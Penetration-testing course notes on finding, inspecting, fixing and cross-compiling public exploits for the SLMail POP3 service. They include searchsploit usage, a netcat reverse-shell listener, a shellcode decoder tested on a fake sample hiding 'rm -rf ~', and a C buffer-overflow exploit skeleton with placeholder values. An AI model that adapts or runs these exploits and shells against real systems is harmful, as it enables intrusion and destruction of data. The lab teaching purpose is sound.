USING PUBLIC EXPLOITS

==============================================================
USING PUBLIC EXPLOITS - Overview
==============================================================

We are now ready to use exploit code written by other people, found online and quite often from untrusted sources. It is not unusual to come across fake exploits whose payload attacks the user running them rather than the target.

Code/exploits should always be inspected before they are compiled or run, e.g.:
#more fake-ssh-exploit.c

If the exploit contains shellcode, save the shellcode into a text file so it can be decoded and examined. Anything that looks like a shell command or a URL inside "shellcode" is a red flag.

Decode the \xNN escapes so that any embedded strings become human readable (printf interprets the escapes, tr removes the line breaks between the string fragments; piping the result through strings shows only the printable runs):

#printf "$(cat filename.txt | tr -d '\n')"
The example in the video is a nasty one: its "shellcode" deletes all files recursively and then connects out to announce to the world what you have done.
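As an added example (not code from the original notes or from the video), the same check written in C: a decoder for pasted "\xNN" shellcode strings plus a strings(1)-style scan of the decoded bytes, run on a constructed fake-exploit payload whose "shellcode" is really a command. The sample bytes and the function names are invented for the illustration.

```c
/* Added example, not from the original notes: do what the printf/tr
 * one-liner does, in a form that can be compiled and reused. It decodes a
 * pasted "\xNN" shellcode string to raw bytes and then lists the printable
 * runs in it, so a fake exploit whose "shellcode" is really a shell command
 * gives itself away before anything is run. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Decode a pasted shellcode string: "\xNN" becomes one byte, quotes and
 * whitespace (the line breaks between string fragments) are skipped, any
 * other character is taken literally. Returns the byte count, or -1 if the
 * output buffer is too small. */
long decode_shellcode(const char *text, unsigned char *out, size_t outlen)
{
    size_t n = 0;
    for (const char *p = text; *p; ) {
        if (*p == '"' || isspace((unsigned char)*p)) { p++; continue; }
        if (n >= outlen) return -1;
        if (p[0] == '\\' && p[1] == 'x' &&
            isxdigit((unsigned char)p[2]) && isxdigit((unsigned char)p[3])) {
            char hex[3] = { p[2], p[3], '\0' };
            out[n++] = (unsigned char)strtoul(hex, NULL, 16);
            p += 4;
        } else {
            out[n++] = (unsigned char)*p++;
        }
    }
    return (long)n;
}

/* Write every run of at least minlen printable bytes to out, one per line
 * (like the strings(1) tool). Returns the number of runs found. */
int find_strings(const unsigned char *buf, size_t len, size_t minlen,
                 char *out, size_t outlen)
{
    int runs = 0;
    size_t used = 0, start = 0;
    if (outlen == 0) return 0;
    for (size_t i = 0; i <= len; i++) {
        int printable = i < len && isprint(buf[i]);
        if (printable) continue;
        size_t runlen = i - start;
        if (runlen >= minlen && used + runlen + 1 < outlen) {
            memcpy(out + used, buf + start, runlen);
            used += runlen;
            out[used++] = '\n';
            runs++;
        }
        start = i + 1;
    }
    out[used] = '\0';
    return runs;
}

/* Constructed sample: the text as it would sit in an exploit source file
 * (the doubled backslashes are only C escaping for a literal backslash).
 * Its "shellcode" carries a readable command instead of machine code. */
static const char FAKE_SHELLCODE[] =
    "\"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\"\n"
    "\"\\x68\\x2f\\x62\\x69\\x6e\\x72\\x6d\\x20\\x2d\\x72\\x66\\x20\\x7e\\x00\"\n"
    "\"\\xcd\\x80\"";

int main(void)
{
    unsigned char raw[512];
    char found[512];
    long n = decode_shellcode(FAKE_SHELLCODE, raw, sizeof raw);
    if (n < 0) return 1;
    int runs = find_strings(raw, (size_t)n, 4, found, sizeof found);
    printf("%ld bytes decoded, %d readable run(s):\n%s", n, runs, found);
    return 0;
}
```

Real shellcode still produces short printable fragments (a "//sh" or "/bin" string is normal for an execve payload), so the thing to look for is a complete command, a hostname or a URL in the output, not the mere presence of readable bytes.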

USING PUBLIC EXPLOITS - Finding Public Exploits

Where can we find exploits that we can run safely? Fortunately there are several reliable sources for exploit code:

Exploit Database (Exploit-DB) - maintained by Offensive Security
- an archive of public exploits and proofs of concept, each filed against the software it targets and, where one exists, the CVE
- www.exploit-db.com

SecurityFocus vulnerability archive
- maintained by Symantec (the archive has since been retired, so its listings stop at that point)
- often includes an exploit or PoC for a known vulnerability
- www.securityfocus.com/vulnerabilities

www.securityfocus.com/vulnerabilities
This site lists the latest vulnerabilities that have been found and reported, by date.

Clicking on a listed vulnerability gives more information: affected systems, the CVE number, references, etc. At times a working PoC may also be found which can be used to demonstrate the bug.

USING PUBLIC EXPLOITS - Exploit DB
www.exploit-db.com

Exploits are searchable, added daily and categorised by type. The archive is also available for offline download and is present in Kali Linux in the /usr/share/exploitdb directory (older Kali releases keep the exploits under platforms/, newer ones under exploits/, so check which layout you have):
# ls -l /usr/share/exploitdb/

Kali contains a useful script which helps search this archive. This script is called searchsploit.

*********************
To find exploits with SLMail in the title:
#searchsploit slmail

To search for the exact text, in that order, in the exploit title (the default is an AND match on each term):
#searchsploit -e internet explorer 11

To update the local copy of the Exploit-DB archive:
#searchsploit -u

As always, help:
#searchsploit -h
*********************

Due to differing versions, patches, configurations etc., most publicly available exploits will not work as is. They are likely to need some debugging and fixing in order to get the expected results. Some exploits are one-shot deals: if the exploit does not work as expected, the service will crash and no longer be available for further attempts until either the service or the machine is restarted. For this reason we never run an exploit without first examining its source code and understanding its inner workings.

We should always strive to set up a small development environment that matches the OS version and the vulnerable software, so that existing exploits can be tested and adjusted to match our environment. Once we are fairly sure the exploit will work, we can proceed to use it against the target machine.

Exploits are written in all manner of languages. Some languages such as C differ between Windows and Linux (different socket headers and libraries), which further complicates matters.

Copy multiple files at once from the archive into the current directory (note the trailing "." target, which cp needs when given more than one source):
#cp /usr/share/exploitdb/platforms/windows/remote/{643.c,646.c} .

USING PUBLIC EXPLOITS - Fixing Public Exploits 1
The headers included at the top of the code indicate which environment and which compiler should be used to build the exploit.

/platforms/windows/remote/643.c (a Windows target, but attacker code written for Linux) should be compiled in a Unix-like environment such as Linux with a compiler such as GCC. Its includes:

#include
#include
#include
#include
#include
#include
#include
#include
#include

Next we see that the hard-coded return address is very likely irrelevant to our target (it was chosen for the author's OS and service build). We then see a hard-coded reverse shell shellcode that will most likely not match our environment (wrong listener IP and port), so we will also need to swap out the shellcode. In addition some buffer offsets seem slightly misaligned, and some other modifications need to be made before we can get this exploit into working condition.

Once the exploit has been updated, we need to compile it to a Linux ELF binary. In this case the modified exploit is called 643-fixed.c and the binary output will be slmail-linux:

#gcc 643-fixed.c -o slmail-linux

To confirm that the file compiled and is now an ELF binary:
# file slmail-linux

Launch SLMail on the target.

Set up a listener for the reverse shell on the port the shellcode was generated for (443 here):
#nc -lvnp 443

Run the exploit, giving it the target IP:
#./slmail-linux <target ip>

If the exploit does not work for you, use tools such as Immunity Debugger (on the target) and Wireshark (to see what actually went over the wire) and fix it.

USING PUBLIC EXPLOITS - Fixing Public Exploits 2
When we look at the second exploit:
/platforms/windows/remote/646.c

we notice some different looking libraries included. These are Windows (Winsock) headers, which indicate that the code was written to be compiled in a Windows environment.

#include
#include
#include
#include

Again, the embedded shellcode and the return address will need to be replaced for our target. Once the code has been modified and updated we need to compile this Windows code on Linux. To our rescue comes MinGW.

MinGW is a Windows cross compiler that is available in Kali Linux. If not already installed, it can be installed with the following command (the package is mingw-w64; the older mingw32 package it replaces is no longer shipped):

#apt-get install mingw-w64

USING PUBLIC EXPLOITS - Cross Compiling Windows Exploit Code
We will use the MinGW cross compiler to compile our Windows-oriented SLMail exploit code into a Windows PE executable.

Trying to run MinGW to compile 646-fixed.c with the old compiler name:
#i586-mingw32msvc-gcc 646-fixed.c
Should be (the name shipped by the mingw-w64 package):
#i686-w64-mingw32-gcc 646-fixed.c

In this example, this results in a compilation error. The next step is to google some of the compilation errors.

After reviewing forums, a fix is identified: the Winsock library (ws2_32) has to be linked explicitly on the command line, and an output file name is given:
#i686-w64-mingw32-gcc 646-fixed.c -lws2_32 -o slmail-windows.exe

Check that the file compiled and is a Windows executable:
#file slmail-windows.exe

We can now run this Windows PE file on Linux using Wine, which is also in Kali. Wine is a compatibility layer that runs Windows executables on Unix-like systems.

Launch SLMail on the target.

Set up a listener for the reverse shell:
#nc -lvnp 443

Run the exploit with Wine, giving it the target IP, e.g.:
#wine slmail-windows.exe 10.11.25.39

If the exploit does not work for you, use tools such as Immunity Debugger and Wireshark and fix it.

Note that we have compiled Windows code on a Linux machine and then run a Windows executable on Linux. This is a useful thing to remember, as we will often be able to compile and run simple Windows applications on Kali and avoid having to switch operating systems.
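As an added example (not code from the original notes and not the Exploit-DB entries 643.c or 646.c), a skeleton that shows the pieces the notes say must be adjusted, the payload offset, the return address, the shellcode and the target address, in one C file that builds on Linux with gcc and on Windows with i686-w64-mingw32-gcc ... -lws2_32. OFFSET, RET, the placeholder shellcode, the POP3 port and the PASS command are assumptions for illustration, not the real SLMail values.

```c
/* Added example, not code from the original notes or from the exploit-db
 * entries they discuss. Skeleton of a network exploit written so that the
 * same source builds on Linux (gcc skel.c -o skel) and on Windows
 * (i686-w64-mingw32-gcc skel.c -lws2_32 -o skel.exe). The OFFSET, RET and
 * SHELLCODE values are placeholders (assumptions), not the real SLMail
 * values; they are exactly what has to be swapped for a given target. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#ifdef _WIN32
#  include <winsock2.h>          /* Winsock: this is why -lws2_32 is needed */
#  include <ws2tcpip.h>
   typedef SOCKET sock_t;
#  define closesock closesocket
#else
#  include <sys/socket.h>        /* POSIX sockets, no extra library needed */
#  include <netinet/in.h>
#  include <arpa/inet.h>
#  include <unistd.h>
   typedef int sock_t;
#  define INVALID_SOCKET (-1)
#  define closesock close
#endif

/* Placeholder parameters (assumed): adjust for the target and the listener. */
#define OFFSET    2606            /* bytes sent before the saved EIP is reached */
#define RET       0x41414141u     /* address of a JMP ESP in the target process */
#define NOPSLED   16

/* Placeholder shellcode (assumed): INT3 breakpoints standing in for msfvenom
 * output that calls back to the nc listener. */
static const unsigned char SHELLCODE[] = { 0xcc, 0xcc, 0xcc, 0xcc };

/* Assemble [junk][RET, little-endian][NOP sled][shellcode] into out.
 * Returns the payload length, or 0 if out is too small. */
size_t build_payload(unsigned char *out, size_t outlen,
                     size_t offset, uint32_t ret,
                     const unsigned char *sc, size_t sclen)
{
    size_t total = offset + 4 + NOPSLED + sclen;
    if (total > outlen) return 0;
    memset(out, 'A', offset);
    out[offset + 0] = (unsigned char)(ret & 0xff);
    out[offset + 1] = (unsigned char)((ret >> 8) & 0xff);
    out[offset + 2] = (unsigned char)((ret >> 16) & 0xff);
    out[offset + 3] = (unsigned char)((ret >> 24) & 0xff);
    memset(out + offset + 4, 0x90, NOPSLED);
    memcpy(out + offset + 4 + NOPSLED, sc, sclen);
    return total;
}

/* Send the payload as the argument of one protocol command (prefix), the
 * way a POP3 overflow exploit would. Returns 0 on success, -1 on failure. */
int send_payload(const char *ip, uint16_t port, const char *prefix,
                 const unsigned char *payload, size_t len)
{
    int rc = -1;
    sock_t s = INVALID_SOCKET;
    struct sockaddr_in sa;
#ifdef _WIN32
    WSADATA wsa;                  /* Winsock must be initialised on Windows */
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) return -1;
#endif
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == INVALID_SOCKET) goto out;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = inet_addr(ip);
    if (connect(s, (struct sockaddr *)&sa, sizeof sa) != 0) goto out;
    if (send(s, prefix, (int)strlen(prefix), 0) < 0) goto out;
    if (send(s, (const char *)payload, (int)len, 0) < 0) goto out;
    if (send(s, "\r\n", 2, 0) < 0) goto out;
    rc = 0;
out:
    if (s != INVALID_SOCKET) closesock(s);
#ifdef _WIN32
    WSACleanup();
#endif
    return rc;
}

int main(int argc, char **argv)
{
    unsigned char buf[4096];
    if (argc != 2) { fprintf(stderr, "usage: %s <target ip>\n", argv[0]); return 1; }
    size_t len = build_payload(buf, sizeof buf, OFFSET, RET, SHELLCODE, sizeof SHELLCODE);
    if (!len) return 1;
    /* Port 110 and the PASS command are assumed for the illustration. */
    return send_payload(argv[1], 110, "PASS ", buf, len) == 0 ? 0 : 1;
}
```

Keeping the three tunables at the top, and the return address written out byte by byte, is what makes an exploit like this quick to re-target: a new JMP ESP address, new msfvenom output and a corrected offset are then the only edits, and the same file compiles either natively or under the cross compiler.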

***
I managed to get this one to work. I made 12 changes. This required replacing the shellcode, replacing the return address, and then adjusting where the pointer is pointing. This is documented in some detail in KeepNote.
***